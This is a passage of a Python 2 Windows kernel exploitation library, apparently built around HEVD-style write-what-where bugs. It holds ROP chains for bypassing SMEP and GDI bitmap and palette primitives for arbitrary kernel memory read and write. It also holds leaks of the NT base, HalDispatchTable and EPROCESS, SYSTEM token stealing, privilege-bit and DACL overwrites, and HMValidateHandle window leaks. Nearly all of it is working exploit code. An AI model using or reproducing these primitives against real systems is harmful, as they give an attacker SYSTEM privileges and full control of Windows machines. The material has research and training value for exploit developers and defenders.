		rop += struct.pack("<Q", return_address)			# (return into shellcode)
	return rop

def set_user_pte_kernel_rop(hal_base, va_pte, return_address):
	"""
	This function creates a ROP chain to set a user address to be kernel address as described here:
	https://www.coresecurity.com/system/files/publications/2016/05/Windows%20SMEP%20bypass%20U%3DS.pdf
	@param hal_base: base address of the hal
	@param va_pte: the PTE address of the VA, that has to be changed from user space to kernel space
	@param return_address: address to return to after the ROP chain completes
	@return: ROP chain
	"""
	(pop_rcx_ret, pop_rax_ret, mov_byte_ptr_rax_cl_ret, wbinvd_ret) = get_smep_rop2_offsets()
	rop = struct.pack("<Q", hal_base + pop_rcx_ret)		# pop rcx; ret
	rop += struct.pack("<Q", 0x63)						# DIRTY + ACCESSED + R/W + PRESENT
	rop += struct.pack("<Q", hal_base + pop_rax_ret)		# pop rax; ret
	rop += struct.pack("<Q", va_pte)						# PTE address
	rop += struct.pack("<Q", hal_base + mov_byte_ptr_rax_cl_ret)		# mov byte ptr [rax], cl; ret
	rop += struct.pack("<Q", hal_base + wbinvd_ret)		# wbinvd; ret
	rop += struct.pack("<Q", return_address)				# The return address (in user space)
	return rop

def stack_pivot_from_kernel_to_user_rop():
	"""
	This function creates a ROP chain to stack pivot to user space from kernel space
	!!!!To be implemented
	@return: ROP chain
	"""
	rop = ''
	return rop

#########################################################################################
############This section contains kernel GDI object abusing related functions############
#########################################################################################


def create_bitmap(width, height, cBitsPerPel):
	"""
	This function will create a bitmap for write-what-where vulnerabilities with GDI abuse
	@param width: width of the bitmap
	@param height: height of the bitmap
	@param cBitsPerPel: bit ber cel 
	@return: the handle to the BITMAP object
	"""
	bitmap_handle = HBITMAP()

	bitmap_handle = gdi32.CreateBitmap(width, height, 1, cBitsPerPel, None)
	if bitmap_handle == None:
		print "[-] Error creating bitmap, exiting...."
		sys.exit(-1)
	print "[+] Bitmap handle: %s" % hex(bitmap_handle)
	return bitmap_handle

def create_bitmaps(width, height, cBitsPerPel):
	"""
	This function will create the worker and manager bitmap for write-what-where vulnerabilities with GDI abuse
	@param width: width of the bitmap
	@param height: height of the bitmap
	@param cBitsPerPel: bit ber cel 
	"""
	print "[*] Creating manager bitmap"
	manager_bitmap_handle = create_bitmap(width, height, cBitsPerPel)
	print "[*] Creating worker bitmap"
	worker_bitmap_handle = create_bitmap(width, height, cBitsPerPel)
	return (manager_bitmap_handle, worker_bitmap_handle)

def calculate_bitmap_size_parameters(s):
	"""
	This function will calculate the parameters to be used for bitmap allocation, if we know what is the size we need to allocate, height=1, cBitsPerPel=8
	@param s: size of the bitmap we need
	@return: (width, height, cBitsPerPel) tuple
	"""
	p = platform.platform()
	if p == 'Windows-10-10.0.10586':
		bmp_offset = 0x258
		min_size = 0x370
	elif p == 'Windows-10-10.0.14393':
		bmp_offset = 0x260
		min_size = 0x370
	elif p == 'Windows-10-10.0.15063':
		bmp_offset = 0x260
		min_size = 0x370
	elif p == 'Windows-8-6.2.9200-SP0':
		bmp_offset = 0x250
		min_size = 0x360
	elif p == 'Windows-8.1-6.3.9600':
		bmp_offset = 0x258
		min_size = 0x370
	elif p == 'Windows-7-6.1.7601-SP1':
		bmp_offset = 0x238
		min_size = 0x350
	
	if s < min_size:
		print "[-] Too small size, such Bitmap can't be allocated..."
		sys.exit(-1)
	elif s < 0x1000:
		print "[+] Bitmap will be allocated in the Paged session pool"
		width = s - bmp_offset - 0x10
	else:
		print "[+] Bitmap will be allocated in the Paged session pool / large pool"
		width = s - bmp_offset
	return (width, 1, 8)

def get_gdisharedhandletable():
	"""
	This function will return the GdiSharedHandleTable address of the current process
	"""
	process_basic_information = PROCESS_BASIC_INFORMATION()
	ntdll.NtQueryInformationProcess(kernel32.GetCurrentProcess(), ProcessBasicInformation, byref(process_basic_information), sizeof(process_basic_information), None)
	peb =  process_basic_information.PebBaseAddress.contents
	return peb.GdiSharedHandleTable

def get_pvscan0_address(bitmap_handle):
	"""
	Get the pvScan0 address, works up to Windows 10 v1511
	@param bitmap_handle: handle to the bitmap
	@return: the PVSCAN0 address in the kernel
	"""
	gdicell64_address = get_gdisharedhandletable() + (bitmap_handle & 0xFFFF) * sizeof(GDICELL64()) #the address is in user space
	gdicell64 = cast(gdicell64_address,POINTER(GDICELL64))
	pvscan0_address = gdicell64.contents.pKernelAddress + 0x50 #0x18 to SurfObj SURFOBJ64 -> 0x38 into SURFOBJ64 pvScan0 ULONG64
	return pvscan0_address

def set_address_bitmap(manager_bitmap, address):
	"""
	Sets the pvscan0 of the worker to the address we want to read/write later through the manager_bitmap
	@param manager_bitmap: handle to the manager bitmap
	@param address: the address to be set in worker bitmap's pvscan0 pointer
	"""
	address = c_ulonglong(address)
	gdi32.SetBitmapBits(manager_bitmap, sizeof(address), addressof(address));
	
def write_memory_bitmap(manager_bitmap, worker_bitmap, dst, src, len):
	"""
	Writes len number of bytes to the destination memory address from the source memory
	@param manager_bitmap: handle to the manager bitmap
	@param worker_bitmap: handle to the worker bitmap
	@param dst: destination to write to
	@param src: the source to copy from
	@param len: the amount to write
	"""
	set_address_bitmap(manager_bitmap, dst)
	gdi32.SetBitmapBits(worker_bitmap, len, src)
	
def read_memory_bitmap(manager_bitmap, worker_bitmap, src, dst, len):
	"""
	Reads len number of bytes to the destination memory address from the source memory
	@param manager_bitmap: handle to the manager bitmap
	@param worker_bitmap: handle to the worker bitmap
	@param dst: destination to copy to
	@param src: the source to read from
	@param len: the amount to read
	"""
	set_address_bitmap(manager_bitmap, src)
	gdi32.GetBitmapBits(worker_bitmap, len, dst)

def create_palette_with_size(s):
	"""
	Creates a palette with the size we want
	@param s: size of the palette
	@return: handle to the palette
	"""
	p = platform.platform()
	#from Windows v1607 onwards the PALETTE HEADER is smaller with 8 bytes
	if p == 'Windows-10-10.0.14393' or p == 'Windows-10-10.0.15063' or p == 'Windows-10-10.0.16299':
		palette_entries_offset = 0x88
	elif p == 'Windows-10-10.0.10586' or p == 'Windows-8-6.2.9200-SP0' or p == 'Windows-8.1-6.3.9600' or p == 'Windows-7-6.1.7601-SP1':
		palette_entries_offset = 0x90
	else:
		print "[-] This platform is not supported for palettes"
		sys.exit(-1)

	if s <= palette_entries_offset:
		print '[-] Bad plaette size! can\'t allocate palette of size < %s!' % hex(palette_entries_offset)
		sys.exit(-1)
	pal_cnt = (s - palette_entries_offset) / 4
	lPalette = LOGPALETTE()
	lPalette.palNumEntries = pal_cnt
	lPalette.palVersion = 0x300
	palette_handle = HANDLE()
	palette_handle = gdi32.CreatePalette(byref(lPalette))
	if palette_handle == None:
		print '[-] Couldn\'t create palette, exiting...'
		sys.exit(-1)
	return palette_handle

def set_address_palette(manager_platte_handle, address):
	"""
	Sets the pFirstColor of the worker to the address we want to read/write later through the manager palette
	@param manager_platte_handle: handle to the manager palette
	@param address: the address to be set in worker palette's pFirstColor pointer
	"""
	address = c_ulonglong(address)
	#we need to divide the len by 4 as the PALETTENTRY is 4 byte
	gdi32.SetPaletteEntries(manager_platte_handle, 0, sizeof(address)/4, addressof(address));
	
def write_memory_palette(manager_platte_handle, worker_platte_handle, dst, src, len):
	"""
	Writes len number of bytes to the destination memory address from the source memory
	@param manager_platte_handle: handle to the manager palette
	@param worker_platte_handle: handle to the worker palette
	@param dst: destination to write to
	@param src: the source to copy from
	@param len: the amount to write
	"""
	set_address_palette(manager_platte_handle, dst)
	#we need to divide the len by 4 as the PALETTENTRY is 4 byte
	gdi32.SetPaletteEntries(worker_platte_handle, 0, len/4, src)
	
def read_memory_palette(manager_platte_handle, worker_platte_handle, src, dst, len):
	"""
	Reads len number of bytes to the destination memory address from the source memory
	@param manager_platte_handle: handle to the manager bitmap
	@param worker_platte_handle: handle to the worker bitmap
	@param dst: destination to copy to
	@param src: the source to read from
	@param len: the amount to read
	"""
	set_address_palette(manager_platte_handle, src)
	#we need to divide the len by 4 as the PALETTENTRY is 4 byte
	gdi32.GetPaletteEntries(worker_platte_handle, 0, len/4, dst)

def leak_nt_base_palette(manager_palette, worker_palette):
	"""
	Function to leak the NT base via TEB
	Based on:
	https://github.com/FuzzySecurity/PSKernel-Primitives/blob/master/Pointer-Leak.ps1
	and
	https://www.blackhat.com/docs/us-17/wednesday/us-17-Schenk-Taking-Windows-10-Kernel-Exploitation-To-The-Next-Level%E2%80%93Leveraging-Write-What-Where-Vulnerabilities-In-Creators-Update-wp.pdf
	@param manager_platte: handle to the manager palette
	@param worker_platte: handle to the worker palette
	@return: NT base
	"""
	print "[*] Leaking NT base via TEB and PALETTEs"
	teb = get_teb_base()
	Win32ThreadInfo_address = c_ulonglong()
	read_memory_palette(manager_palette, worker_palette, teb + 0x78, byref(Win32ThreadInfo_address), sizeof(Win32ThreadInfo_address))
	print "[+] Win32ThreadInfo_address: %s" % hex(Win32ThreadInfo_address.value)

	KTHREAD_address = c_ulonglong()
	read_memory_palette(manager_palette, worker_palette, Win32ThreadInfo_address.value, byref(KTHREAD_address), sizeof(KTHREAD_address))
	print "[+] KTHREAD address: %s " % hex(KTHREAD_address.value)
	
	pointer_into_nt = c_ulonglong()
	read_memory_palette(manager_palette, worker_palette, KTHREAD_address.value + 0x2a8, byref(pointer_into_nt), sizeof(pointer_into_nt))
	print "[+] Pointer into NT address: %s" % hex(pointer_into_nt.value)
	
	#search the MZ header backwards
	mz = 0x905a4d
	start_address = 0xFFFFFFFFFFFFF000 & pointer_into_nt.value
	while(True):
		data = c_uint()
		#check the first 4 bytes of the page if it's the MZ header
		read_memory_palette(manager_palette, worker_palette, start_address, byref(data), sizeof(data))
		if data.value == mz:
			print "[+] NT base address found: %s" % hex(start_address)
			return start_address
		else:
			start_address = start_address - 0x1000

def leak_haldispatchtable_palette(manager_palette, worker_palette):
	"""
	Function to leak the HalDispatchTable Address using PALETTEs
	@param manager_platte: handle to the manager palette
	@param worker_platte: handle to the worker palette
	@return: HalDispatchTable address
	"""
	print "[*] Locating HalDispatchTable base..."
 	if platform.architecture()[0] == '64bit':
		kernel32.LoadLibraryExA.restype = c_uint64
		kernel32.GetProcAddress.argtypes = [c_uint64, POINTER(c_char)]
		kernel32.GetProcAddress.restype = c_uint64
	krnlbase = leak_nt_base_palette(manager_palette, worker_palette)
	kernelver = ['ntoskrnl.exe','ntkrnlmp.exe','ntkrnlpa.exe','ntkrpamp.exe']
	for k in kernelver:
		print "[+] Loading %s in userland" % k
		hKernel = kernel32.LoadLibraryExA(k, 0, 1)
		if hKernel != 0:
			print "[+] %s base address : %s" % (k, hex(hKernel))
			break
	if hKernel == 0:
		print "[-] Couldn't load kernel, exiting..."
		sys.exit(-1)
	HalDispatchTable = kernel32.GetProcAddress(hKernel, 'HalDispatchTable')
	HalDispatchTable -= hKernel
	HalDispatchTable += krnlbase
	print "[+] HalDispatchTable address:", hex(HalDispatchTable)
	return HalDispatchTable

#original source: https://github.com/GradiusX/HEVD-Python-Solutions
def get_current_eprocess_bitmap(manager_bitmap, worker_bitmap, pointer_EPROCESS):
	"""
	This function gets the kernel address of the current EPROCESS structure. It does it by going through the EPROCESS linked list.
	We need the bitmaps in order to read from memory.
	@param manager_bitmap: handle to the manager bitmap
	@param worker_bitmap: handle to the worker bitmap
	@param pointer_EPROCESS: pointer to an EPROCESS structure to start with (typically SYSTEM)
	@return: pointer to the current EPROCESS structure
	"""
	if platform.architecture()[0] == '64bit':
		#get OS EPROCESS structure constans values
		(KTHREAD_Process, EPROCESS_ActiveProcessLinks, EPROCESS_UniqueProcessId, EPROCESS_Token, EPROCESS_ImageFileName, TOKEN_IntegrityLevelIndex) = getosvariablesx64()
		flink = c_ulonglong()
		read_memory_bitmap(manager_bitmap, worker_bitmap, pointer_EPROCESS + EPROCESS_ActiveProcessLinks, byref(flink), sizeof(flink));	
		current_pointer_EPROCESS = 0
		while (1):
			unique_process_id = c_ulonglong(0)
			# Adjust EPROCESS pointer for next entry; flink.value is pointing to the next Flink so we need to subtract that offset
			pointer_EPROCESS = flink.value - EPROCESS_ActiveProcessLinks
			# Get PID; 
			read_memory_bitmap(manager_bitmap, worker_bitmap, pointer_EPROCESS + EPROCESS_UniqueProcessId, byref(unique_process_id), sizeof(unique_process_id));	
			# Check if we're in the current process
			if (os.getpid() == unique_process_id.value):
				current_pointer_EPROCESS = pointer_EPROCESS
				break
			read_memory_bitmap(manager_bitmap, worker_bitmap, pointer_EPROCESS + EPROCESS_ActiveProcessLinks, byref(flink), sizeof(flink));	
			# If next same as last, we've reached the end
			if (pointer_EPROCESS == flink.value - EPROCESS_ActiveProcessLinks):
				break		
		return current_pointer_EPROCESS
	else:
		print "[-] Getting the current EPROCESS strcuture function is not prepared to work on x86, exiting..."
		sys.exit(-1)

def find_eprocess_by_pid_palette(manager_palette, worker_palette, pointer_EPROCESS, search_pid):
	"""
	This function gets the kernel address of the EPROCESS structure for the given PID. It does it by going through the EPROCESS linked list.
	We need the palettes in order to read from memory.
	@param manager_palette: handle to the manager palette
	@param worker_palette: handle to the worker palette
	@param pointer_EPROCESS: pointer to an EPROCESS structure to start with
	@param search_pid: The PID of the process which EPROCESS we look for
	@return: pointer to the current EPROCESS structure
	"""
	if platform.architecture()[0] == '64bit':
		#get OS EPROCESS structure constans values
		(KTHREAD_Process, EPROCESS_ActiveProcessLinks, EPROCESS_UniqueProcessId, EPROCESS_Token, EPROCESS_ImageFileName, TOKEN_IntegrityLevelIndex) = getosvariablesx64()
		flink = c_ulonglong()
		read_memory_palette(manager_palette, worker_palette, pointer_EPROCESS + EPROCESS_ActiveProcessLinks, byref(flink), sizeof(flink));	
		current_pointer_EPROCESS = 0
		while (1):
			unique_process_id = c_ulonglong(0)
			# Adjust EPROCESS pointer for next entry; flink.value is pointing to the next Flink so we need to subtract that offset
			pointer_EPROCESS = flink.value - EPROCESS_ActiveProcessLinks
			# Get PID; 
			read_memory_palette(manager_palette, worker_palette, pointer_EPROCESS + EPROCESS_UniqueProcessId, byref(unique_process_id), sizeof(unique_process_id));	
			# Check if we're in the current process
			if (search_pid == unique_process_id.value):
				current_pointer_EPROCESS = pointer_EPROCESS
				break
			read_memory_palette(manager_palette, worker_palette, pointer_EPROCESS + EPROCESS_ActiveProcessLinks, byref(flink), sizeof(flink));	
			# If next same as last, we've reached the end
			if (pointer_EPROCESS == flink.value - EPROCESS_ActiveProcessLinks):
				break		
		return current_pointer_EPROCESS
	else:
		print "[-] Getting the current EPROCESS strcuture function is not prepared to work on x86, exiting..."
		sys.exit(-1)

def get_current_and_system_eprocess_palette(manager_palette, worker_palette):
	"""
	This function gets the kernel address of the current and SYSTEM EPROCESS structure
	We need the palettes in order to read from memory.
	@param manager_palette: handle to the manager palette
	@param worker_palette: handle to the worker palette
	@return: tuple of the memeory addresses to the EPROCESS structures
	"""
	if platform.architecture()[0] == '64bit':
		# Get SYSTEM EPROCESS
		try:
			print "[*] Trying with PsInitialSystemProcess"
			#try first running this in case process runs in medium integrity mode
			PsInitialSystemProcess = get_psinitialsystemprocess()
			system_EPROCESS = c_ulonglong()
			read_memory_palette(manager_palette, worker_palette, PsInitialSystemProcess, byref(system_EPROCESS), sizeof(system_EPROCESS));	
			system_EPROCESS = system_EPROCESS.value	
			print "[+] SYSTEM EPROCESS: %s" % hex(system_EPROCESS)
			# Get current EPROCESS
			current_EPROCESS = find_eprocess_by_pid_palette(manager_palette, worker_palette, system_EPROCESS, os.getpid())
			print "[+] Current EPROCESS: %s" % hex(current_EPROCESS)
		except Exception, e:
			print "[-] Error: %s" % str(e)
			print "[*] Process possibly runs in low integrity, trying to leak address with tagWND structures"
			current_EPROCESS = leak_eprocess_address_palette(manager_palette, worker_palette)
			print "[+] Current EPROCESS: %s" % hex(current_EPROCESS)
			system_EPROCESS = find_eprocess_by_pid_palette(manager_palette, worker_palette, current_EPROCESS, 4)
			print "[+] SYSTEM EPROCESS: %s" % hex(system_EPROCESS)
		return (current_EPROCESS, system_EPROCESS)
	else:
		print "[-] Getting the current and SYSTEM EPROCESS strcuture function is not prepared to work on x86, exiting..."
		sys.exit(-1)

def find_pid_and_eprocess_by_name_palette(manager_palette, worker_palette, pointer_EPROCESS, search_name):
	"""
	This function gets the PID of a process with the given name. It does it by going through the EPROCESS linked list with the help of PALETTE objects.
	We need the palettes in order to read from memory.
	@param manager_palette: handle to the manager palette
	@param worker_palette: handle to the worker palette
	@param pointer_EPROCESS: pointer to an EPROCESS structure to start with
	@param search_name: The process we look for
	@return: PID of the process and the EPROCESS address
	"""
	if platform.architecture()[0] == '64bit':
		#get OS EPROCESS structure constans values
		(KTHREAD_Process, EPROCESS_ActiveProcessLinks, EPROCESS_UniqueProcessId, EPROCESS_Token, EPROCESS_ImageFileName, TOKEN_IntegrityLevelIndex) = getosvariablesx64()
		flink = c_ulonglong()
		read_memory_palette(manager_palette, worker_palette, pointer_EPROCESS + EPROCESS_ActiveProcessLinks, byref(flink), sizeof(flink));	
		current_pointer_EPROCESS = 0
		while (1):
			unique_process_id = c_ulonglong(0)
			image_file_name = c_uint(0) #we will read the first 4 bytes to this
			# Adjust EPROCESS pointer for next entry; flink.value is pointing to the next Flink so we need to subtract that offset
			pointer_EPROCESS = flink.value - EPROCESS_ActiveProcessLinks
			# Get PID; 
			read_memory_palette(manager_palette, worker_palette, pointer_EPROCESS + EPROCESS_UniqueProcessId, byref(unique_process_id), sizeof(unique_process_id));	
			# Get Name; 
			read_memory_palette(manager_palette, worker_palette, pointer_EPROCESS + EPROCESS_ImageFileName, byref(image_file_name), sizeof(image_file_name));
			current_name_4bytes = struct.pack("I",image_file_name.value).lower()
			# Check if we're in the current process
			if (current_name_4bytes == search_name[0:4]):
				break
			read_memory_palette(manager_palette, worker_palette, pointer_EPROCESS + EPROCESS_ActiveProcessLinks, byref(flink), sizeof(flink));	
			# If next same as last, we've reached the end
			if (pointer_EPROCESS == flink.value - EPROCESS_ActiveProcessLinks):
				break
		print "[+] PID of %s is: %s" % (search_name, hex(unique_process_id.value))	
		print "[+] EPROCESS structure of %s is at: %s" % (search_name, hex(pointer_EPROCESS))	
		return (unique_process_id.value, pointer_EPROCESS)
	else:
		print "[-] Getting the current EPROCESS strcuture function is not prepared to work on x86, exiting..."
		sys.exit(-1)

def tokenstealing_with_bitmaps(manager_bitmap, worker_bitmap):
	"""
	This function perform tokenstealing with the help of bitmaps
	@param manager_bitmap: handle to the manager bitmap
	@param worker_bitmap: handle to the worker bitmap	
	"""
	if platform.architecture()[0] == '64bit':
		# Get SYSTEM EPROCESS
		PsInitialSystemProcess = get_psinitialsystemprocess()
		system_EPROCESS = c_ulonglong()
		read_memory_bitmap(manager_bitmap, worker_bitmap, PsInitialSystemProcess, byref(system_EPROCESS), sizeof(system_EPROCESS));	
		system_EPROCESS = system_EPROCESS.value	
		print "[+] SYSTEM EPROCESS: %s" % hex(system_EPROCESS)
	
		# Get current EPROCESS
		current_EPROCESS = get_current_eprocess_bitmap(manager_bitmap, worker_bitmap, system_EPROCESS)
		print "[+] Current EPROCESS: %s" % hex(current_EPROCESS)

		(KTHREAD_Process, EPROCESS_ActiveProcessLinks, EPROCESS_UniqueProcessId, EPROCESS_Token, EPROCESS_ImageFileName, TOKEN_IntegrityLevelIndex) = getosvariablesx64()
		system_token = c_ulonglong()
		print "[+] Reading System TOKEN"
		read_memory_bitmap(manager_bitmap, worker_bitmap, system_EPROCESS + EPROCESS_Token, byref(system_token), sizeof(system_token));
		print "[+] Writing System TOKEN"
		write_memory_bitmap(manager_bitmap, worker_bitmap, current_EPROCESS + EPROCESS_Token, byref(system_token), sizeof(system_token));
	else:
		print "[-]Token stealing with bitmaps function is not prepared to work on x86, exiting..."
		sys.exit(-1)

def privilege_with_palettes(manager_palette, worker_palette):
	"""
	This function will give full privileges to the process, like described here: https://improsec.com/blog/windows-kernel-shellcode-on-windows-10-part-3
	@param manager_palette: handle to the manager palette
	@param worker_palette: handle to the worker palette	
	"""
	print "[*] Giving full privileges to the process"
	if platform.architecture()[0] == '64bit':
		# Get SYSTEM EPROCESS
		(current_EPROCESS, system_EPROCESS) = get_current_and_system_eprocess_palette(manager_palette, worker_palette)

		(KTHREAD_Process, EPROCESS_ActiveProcessLinks, EPROCESS_UniqueProcessId, EPROCESS_Token, EPROCESS_ImageFileName, TOKEN_IntegrityLevelIndex) = getosvariablesx64()
		token = c_ulonglong()
		print "[+] Reading TOKEN address"
		read_memory_palette(manager_palette, worker_palette, current_EPROCESS + EPROCESS_Token, byref(token), sizeof(token));
		token_address = 0xFFFFFFFFFFFFFFF0 & token.value
		print "[+] Giving full privileges"
		full_priv = c_ulonglong(0xFFFFFFFFFFFFFFFF)
		write_memory_palette(manager_palette, worker_palette, token_address + 0x40, byref(full_priv), sizeof(full_priv)); #Present bits, has to be set on newer Win10 versions
		write_memory_palette(manager_palette, worker_palette, token_address + 0x48, byref(full_priv), sizeof(full_priv)); #Enabled bits
	else:
		print "[-]Giving full privileges to the process is not prepared to work on x86, exiting..."
		sys.exit(-1)

def acl_with_palettes(manager_palette, worker_palette, search_name):
	"""
	This function will give full privileges to the process, like described here: https://improsec.com/blog/windows-kernel-shellcode-on-windows-10-part-4-there-is-no-code
	@param manager_palette: handle to the manager palette
	@param worker_palette: handle to the worker palette
	@param search_name: the process to look for
	"""
	print "[*] Setting ACL on %s" % search_name
	if platform.architecture()[0] == '64bit':
		# Get SYSTEM EPROCESS
		(current_EPROCESS, system_EPROCESS) = get_current_and_system_eprocess_palette(manager_palette, worker_palette)
		
		(KTHREAD_Process, EPROCESS_ActiveProcessLinks, EPROCESS_UniqueProcessId, EPROCESS_Token, EPROCESS_ImageFileName, TOKEN_IntegrityLevelIndex) = getosvariablesx64()
		
		(pid, pointer_EPROCESS) = find_pid_and_eprocess_by_name_palette(manager_palette, worker_palette, current_EPROCESS, search_name)
		
		#SecurityDescriptor is at -0x8 offset from EPROCESS, it's in the OBJECT_HEADER
		SecurityDescriptor_pointer = c_ulonglong(0)
		read_memory_palette(manager_palette, worker_palette, pointer_EPROCESS - 0x8, byref(SecurityDescriptor_pointer), sizeof(SecurityDescriptor_pointer));
		SecurityDescriptor_address = SecurityDescriptor_pointer.value & 0xFFFFFFFFFFFFFFF0
		print "[*] SecurityDescriptor_address is at %s " % hex(SecurityDescriptor_address)
		DACL = c_ulonglong(0)
		read_memory_palette(manager_palette, worker_palette, SecurityDescriptor_address + 0x48, byref(DACL), sizeof(DACL));
		DACL_overwrite = c_ulonglong((DACL.value & 0xFFFFFFFFFFFFFF00) + 0xb)
		write_memory_palette(manager_palette, worker_palette, SecurityDescriptor_address + 0x48, byref(DACL_overwrite), sizeof(DACL_overwrite));

		token = c_ulonglong()
		print "[+] Reading TOKEN address"
		read_memory_palette(manager_palette, worker_palette, current_EPROCESS + EPROCESS_Token, byref(token), sizeof(token));
		token_address = 0xFFFFFFFFFFFFFFF0 & token.value
		integrity_level_settings = c_ulonglong(0)
		read_memory_palette(manager_palette, worker_palette, token_address + TOKEN_IntegrityLevelIndex, byref(integrity_level_settings), sizeof(integrity_level_settings));
		integrity_level_settings_overwrite = c_ulonglong(integrity_level_settings.value & 0xFFFFFF00FFFFFFFF)
		write_memory_palette(manager_palette, worker_palette, token_address + TOKEN_IntegrityLevelIndex, byref(integrity_level_settings_overwrite), sizeof(integrity_level_settings_overwrite));

	else:
		print "[-]Setting ACL is not prepared to work on x86, exiting..."
		sys.exit(-1)

def tokenstealing_with_palettes(manager_palette, worker_palette):
	"""
	This function perform tokenstealing with the help of palettes
	@param manager_palette: handle to the manager palette
	@param worker_palette: handle to the worker palette	
	"""
	if platform.architecture()[0] == '64bit':
		# Get SYSTEM EPROCESS
		(current_EPROCESS, system_EPROCESS) = get_current_and_system_eprocess_palette(manager_palette, worker_palette)

		(KTHREAD_Process, EPROCESS_ActiveProcessLinks, EPROCESS_UniqueProcessId, EPROCESS_Token, EPROCESS_ImageFileName, TOKEN_IntegrityLevelIndex) = getosvariablesx64()
		system_token = c_ulonglong()
		print "[+] Reading System TOKEN"
		read_memory_palette(manager_palette, worker_palette, system_EPROCESS + EPROCESS_Token, byref(system_token), sizeof(system_token));
		print "[+] Writing System TOKEN"
		write_memory_palette(manager_palette, worker_palette, current_EPROCESS + EPROCESS_Token, byref(system_token), sizeof(system_token));
	else:
		print "[-]Token stealing with palettes function is not prepared to work on x86, exiting..."
		sys.exit(-1)

def get_accel_kernel_address(handle):
	"""
	Returns kernel pointer of Accelerator Table given a Handle to it
	@param handle: handle
	@return: kernel pointer of Accelerator Table
	"""
	if platform.architecture()[0] == '64bit':
		gSharedInfo_address = kernel32.GetProcAddress(user32._handle,"gSharedInfo")
		handle_entry = cast (gSharedInfo_address + 0x8, POINTER(c_void_p))
		pHead_ptr_ptr = handle_entry.contents.value + (handle & 0xFFFF) * 0x18
		pHead_ptr = cast(pHead_ptr_ptr, POINTER(c_void_p))
	else:
		gSharedInfo_address = kernel32.GetProcAddress(user32._handle,"gSharedInfo")
		handle_entry = cast (gSharedInfo_address + 0x8, POINTER(c_void_p))
		pHead_ptr_ptr = handle_entry.contents.value + (handle & 0xFFFF) * 0xc
		pHead_ptr = cast(pHead_ptr_ptr, POINTER(c_void_p))
	return pHead_ptr.contents.value

def alloc_free_accelerator_tables():
	"""
	Allocates and Frees Accelerator Tables until last 2 addresses match
	@return kernel pointer to the accelarator table
	"""
	previous_kernel_address = 0
	while (1):
		accel_array = ACCEL_ARRAY()
		hAccel = user32.CreateAcceleratorTableA(addressof(accel_array), 675) # size = 0x1000
		kernel_address = get_accel_kernel_address(hAccel)
		user32.DestroyAcceleratorTable(hAccel)
		if previous_kernel_address == kernel_address:
			print "[+] Duplicate AcceleratorTable: 0x%X" % kernel_address
			return kernel_address
		previous_kernel_address = kernel_address

#https://github.com/sam-b/windows_kernel_address_leaks/blob/master/HMValidateHandle/HMValidateHandle/HMValidateHandle.cpp
def findHMValidateHandle():
	"""
	Searches for HMValidateHandle() function
	@return: pHMValidateHandle
	"""
	print "[*] Locating HMValidateHandle offset"	
	kernel32.LoadLibraryA.restype = HMODULE
	hUser32 = kernel32.LoadLibraryA("user32.dll")
	pIsMenu = kernel32.GetProcAddress(hUser32, "IsMenu")
	if pIsMenu == None:
		print "[-] Failed to find location of exported function 'IsMenu' within user32.dll..."
		sys.exit(-1)
	print "[+] user32.IsMenu: 0x%X" % pIsMenu
	pHMValidateHandle_offset = 0
	offset = 0
	while (offset < 0x1000):
		tempByte = cast(pIsMenu + offset, POINTER(c_ubyte))
		# if byte == 0xE8
		if tempByte.contents.value == 0xE8:
			pHMValidateHandle_offset = pIsMenu + offset + 1
			break
		offset = offset + 1
	if pHMValidateHandle_offset == 0:
		print "[-] Failed to find offset of HMValidateHandle from location of 'IsMenu'..."
		sys.exit(-1)
	print "[+] Pointer to HMValidateHandle offset: 0x%X" % pHMValidateHandle_offset
	HMValidateHandle_offset = (cast(pHMValidateHandle_offset, POINTER(c_long))).contents.value
	print "[+] HMValidateHandle offset: 0x%X" % HMValidateHandle_offset
	#Add 0xb because relative offset of call starts from next instruction after call, which is 0xb bytes from start of user32.IsMenu
	#The +11 is to skip the padding bytes as on Windows 10 these aren't nops
	pHMValidateHandle = pIsMenu + HMValidateHandle_offset + 0xb
	print "[+] HMValidateHandle pointer: 0x%X" % pHMValidateHandle
	return pHMValidateHandle

def PyWndProcedure(hWnd, Msg, wParam, lParam):
	""" Callback Function for CreateWindow() """
	# if Msg == WM_DESTROY
	if Msg == 2:
		user32.PostQuitMessage(0)
	else:
		return user32.DefWindowProcW(hWnd, Msg, wParam, lParam)
	return 0

#source: https://github.com/GradiusX/HEVD-Python-Solutions/blob/master/Win10%20x64%20v1703/HEVD_arbitraryoverwrite.py
def allocate_free_window(classNumber, pHMValidateHandle):
	""" Allocate and Free a single Window """

	# Create prototype for HMValidateHandle()
	HMValidateHandleProto = WINFUNCTYPE (c_ulonglong, HWND, c_int)
	HMValidateHandle = HMValidateHandleProto(pHMValidateHandle)

	WndProc = WNDPROCTYPE(PyWndProcedure)
	hInst = kernel32.GetModuleHandleA(0)

	# instantiate WNDCLASSEX 
	wndClass = WNDCLASSEX()
	wndClass.cbSize = sizeof(WNDCLASSEX)
	wndClass.lpfnWndProc = WndProc
	wndClass.cbWndExtra = 0
	wndClass.hInstance = hInst
	wndClass.lpszMenuName = 'A' * 0x8f0 
	wndClass.lpszClassName = "Class_" + str(classNumber)

	# Register Class and Create Window
	hCls = user32.RegisterClassExW(byref(wndClass))
	hWnd = user32.CreateWindowExA(0,"Class_" + str(classNumber),'Franco',0xcf0000,0,0,300,300,0,0,hInst,0)
	p = platform.platform()
	if  p == 'Windows-10-10.0.15063':
		pcls = 0xa8
		lpszMenuNameOffset = 0x90
	elif p == 'Windows-10-10.0.16299':	
		pcls = 0xa8
		lpszMenuNameOffset = 0x98
	else:
		pcls = 0x98
		lpszMenuNameOffset = 0x88

	# Run HMValidateHandle on Window handle to get a copy of it in userland 
	pWnd = HMValidateHandle(hWnd,1)
	# Read pSelf from copied Window 
	kernelpSelf = (cast(pWnd+0x20, POINTER(c_ulonglong))).contents.value
	# Calculate ulClientDelta (tagWND.pSelf - HMValidateHandle()) 
	# pSelf = ptr to object in Kernel Desktop Heap; pWnd = ptr to object in User Desktop Heap 
	ulClientDelta = kernelpSelf - pWnd
	# Read tagCLS from copied Window 
	kernelTagCLS = (cast(pWnd+pcls, POINTER(c_ulonglong))).contents.value
	# Calculate user-land tagCLS location: tagCLS - ulClientDelta 
	userTagCLS = kernelTagCLS - ulClientDelta
	# Calculate kernel-land tagCLS.lpszMenuName 
	tagCLS_lpszMenuName = (cast (userTagCLS+lpszMenuNameOffset, POINTER(c_ulonglong))).contents.value
		
	# Destroy Window
	user32.DestroyWindow(hWnd)
	# Unregister Class
	user32.UnregisterClassW(c_wchar_p("Class_" + str(classNumber)), hInst)
		
	return tagCLS_lpszMenuName

